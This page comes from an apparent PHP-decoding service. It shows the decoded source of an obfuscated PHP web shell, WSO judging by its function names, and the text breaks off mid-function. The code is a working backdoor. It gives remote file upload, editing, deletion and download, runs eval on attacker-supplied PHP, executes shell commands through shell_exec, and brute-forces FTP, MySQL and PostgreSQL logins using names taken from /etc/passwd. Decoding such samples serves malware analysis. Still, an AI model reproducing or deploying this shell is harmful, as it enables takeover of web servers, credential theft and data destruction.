Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto Cjo7J; LqaMO: $safe_mode = @ini_get("\x73\x61\x66\x65\137\155\157\x64\145"); ..

Decoded Output download

<?php 
 goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: if (!$safe_mode) { error_reporting(0); } goto Gop14; j2Rfu: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto Zxful; GFRHq: @ini_set("error_log", NULL); goto g7ZCc; N84uU: function actionFilesMan() { goto J7jRR; la8rp: if (class_exists("ZipArchive")) { echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; } goto GTtN3; uO4Od: if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can't upload file!"; } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": goto zgV_d; mm32x: break; goto hEfbk; zgV_d: function deleteDir($path) { goto RrCM3; zxeby: $dh = opendir($path); goto TCJ3G; TCJ3G: while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } goto qhDI4; SLRoZ: @rmdir($path); goto ld2N6; RrCM3: $path = substr($path, -1) == "/" ? $path : $path . "/"; goto zxeby; qhDI4: closedir($dh); goto SLRoZ; ld2N6: } goto Jstso; Jstso: if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { goto Fce39; jTf8C: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto sVDIO; Fce39: if ($f == "..") { continue; } goto NavX2; NavX2: $f = urldecode($f); goto jTf8C; sVDIO: } } goto mm32x; hEfbk: case "paste": goto aIzMf; aIzMf: if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto DXZu5; OpM7_: $h = @opendir($c . $s); goto XF_lF; XF_lF: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto v_Vn9; DXZu5: mkdir($d . $s); goto OpM7_; v_Vn9: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto qKJrU; TXDEI: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto xPGvS; AwOVO: $h = @opendir($c . $s); goto TXDEI; qKJrU: mkdir($d . $s); goto AwOVO; xPGvS: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { goto Jun5P; Jun5P: chdir($_COOKIE["c"]); goto T_RpN; MVV2r: $zip->close(); goto CqwAG; T_RpN: foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } goto JhWjt; JhWjt: chdir($GLOBALS["cwd"]); goto MVV2r; CqwAG: } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { goto nrwbR; QmWa1: chdir($GLOBALS["cwd"]); goto bK26y; zHKjB: wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); goto QmWa1; BU3zr: $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); goto zHKjB; nrwbR: chdir($_COOKIE["c"]); goto BU3zr; bK26y: } goto tJ8ED; HwZnR: setcookie("f", '', time() - 3600); goto TZk2t; TZk2t: break; goto yoTwQ; tJ8ED: unset($_COOKIE["f"]); goto HwZnR; yoTwQ: default: if (!empty($_POST["p1"])) { goto TYMaj; XHEG8: WSOsetcookie("c", @$_POST["c"]); goto Unr9o; TYMaj: WSOsetcookie("act", $_POST["p1"]); goto XUMLY; XUMLY: WSOsetcookie("f", serialize(@$_POST["f"])); goto XHEG8; Unr9o: } break; } } goto bpziK; JbUVa: usort($files, "wsoCmp"); goto pBUl1; RjKbq: function wsoCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } goto JbUVa; flVXx: $GLOBALS["sort"] = $sort; goto RjKbq; b42P7: echo "</select>&nbsp;"; goto zga6H; QsnjB: $dirContent = wsoScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); goto DufhY; EoM5y: if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto uaEIV; ecDrl: echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; goto QsnjB; J7jRR: if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } goto uO4Od; zqQv8: foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "<script>\xd
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
\x9		if(d.files.elements[i].type == 'checkbox')\xd\xa	\x9		d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa	}\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; goto lC5LC; b9q_L: echo "<tr><td colspan=7>\xd\xa	<input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
\xa	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto la8rp; MMpaa: $sort = array("name", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo "<option value='tar'>Compress (tar.gz)</option>"; goto qCBL1; zga6H: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "wsoCmp"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } goto ehyTX; gIv2Z: echo "</div>"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } goto OeBNf; FcH_v: if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } goto XQqyZ; tJhrh: if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } goto UpcWr; hJxBN: echo "<h1>File tools</h1><div class=content>"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "<br><br>"; goto kfx86; vLiGd: echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "</pre>"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "<pre class=ml1>"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; goto XU2TQ; MtAXT: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo "</textarea><input type=submit value=">>"></form>"; goto Pjp_6; l2f3k: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script>p3_="";</script>"; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } goto S0xqX; S0xqX: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value=">>"></form>"; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>"></form>"; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . wsoPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : "-"); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = "-"; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : "-"; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : "-"; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : "-"); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : "-"; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : "-"; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : "-"; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : "-"); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : "-"; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
	\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo "</pre></div>"; goto ujMFQ; Sz7n2: echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; goto LBJl4; VERJt: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "</div><br>"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo "</div>"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xd
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>
\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . ""></td><td>"; goto dxViD; dxViD: $tmp = "<input type=text name=sql_base value=''>"; goto L_VIT; Auorx: echo "</td>\xd\xa\x9	\x9	<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xd\xa		\x9</tr>\xd\xa\x9	</table>
	\x9<script>\xd
            s_db='" . @addslashes($_POST["sql_base"]) . "';\xd\xa            function fs(f) {\xd\xa                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
